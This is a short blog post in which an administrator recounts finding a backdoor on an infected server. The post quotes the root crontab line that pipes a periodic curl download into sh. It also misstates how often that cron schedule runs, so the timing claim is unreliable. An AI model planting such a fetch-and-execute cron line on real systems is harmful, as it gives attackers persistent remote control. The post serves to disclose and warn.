The case of simple server backdoor

Recently, I have found that one of my servers was infected with malicious apache module. This is not something I am too proud about, but it happens. The original infection happened either through plesk or through pre-existing user. That is why I am stopping using Plesk control panels for VPS’es and DE’es I own and manage. The upgrade process between major versions is painful and one can’t expect to keep servers secure for longer periods of time.
However, what is more interesting from this story is the backdoor that was made very simply and was in plain sight. This line was in root’s crontab and each admin thought it was something other admin used for monitoring or something else:

*/3 * * * * /usr/bin/curl --connect-timeout 5 --max-time 10 -s | sh >> /dev/null

This cron job launches 3 times per hour and downloads /executes single command. It is very simple, but it allows downloading and executing single command on one’s server. I am still blaming for not noticing it earlier.


  1. Hi, I found this on my server. Did you find the downloaded files and see what it really does? I mean, I want to find maliciuous code on my server

Speak Your Mind